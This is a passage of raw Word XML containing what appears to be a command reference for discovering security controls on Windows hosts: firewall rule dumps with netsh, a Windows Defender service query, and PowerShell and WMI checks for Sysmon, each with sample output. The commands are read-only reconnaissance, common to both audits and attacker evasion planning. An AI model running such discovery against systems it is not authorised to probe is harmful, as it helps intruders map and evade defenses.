      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Enable   No          File and Printer Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65EBDB02" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="243DCA8C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall dump or</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="71902922" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">netsh.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> firewall show rule name=all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="4286FA1B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="664D1AFE">
          <v:rect id="_x0000_i1031" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="4F35C848" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5D515044" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> query </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>windefend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="13811FF1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVICE_NAME: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>windefend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5BB30EDB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>TYPE :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 WIN32_OWN_PROCESS  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7F4DCB22" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>STATE :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 RUNNING </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6676E6EA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="7A8579BE" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6D9C6CF3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Verifies that </w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Defender service</w:t>
      </w:r>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="250C9AF1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3357900F">
          <v:rect id="_x0000_i1030" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="6FA0E258" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0A183F29" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell AV/Sysmon Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5F3BBEAA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysmon process listing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="120E777F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Handles  NPM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>(K)    PM(K) ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="500B00A7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    290      17     5256 ... 3176   0 Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5124E560" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0F80847F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell.exe /c "Get-Process | Where-Object </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>{ $</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>_.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ProcessName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -eq 'Sysmon' }"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="5067AFD6" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Services with Sysmon in display name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="34D18B52" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Status   Name               DisplayName                           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="65DA95D0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">------   ----               -----------                           </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0DB24247" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Running  Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Sysmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0AA55EFC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="05399E13" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>powershell.exe /c "Get-Service | where-object {$</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>_.DisplayName</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> -like '*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>sysm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>*'}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="0E71FF0B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WMI query for Sysmon service description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="46520F0E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ProcessId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Name   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>StartMode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> State   Status </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ExitCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="55185F8E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>--------- ----   --------- -----   ------ --------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="2316B1C4" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">3176      Sysmon Auto      Running OK     0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="38AE6440" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="1548BFFF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>powershell.exe /c "Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081210C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Win32_Service -Filter 'Description = ''System Monitor service'''"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="00285D58" w14:paraId="22FA5DD3" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00285D58">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="0E521BFC">
          <v:rect id="_x0000_i1029" style="width:395.95pt;height:.05pt;mso-width-percent:0;mso-height-percent:0;mso-width-percent:0;mso-height-percent:0" alt="" o:hr="t" o:hrstd="t" o:hrpct="846" o:hralign="center" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0081210C" w:rsidR="0081210C" w:rsidP="0081210C" w:rsidRDefault="0081210C" w14:paraId="79EE265D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
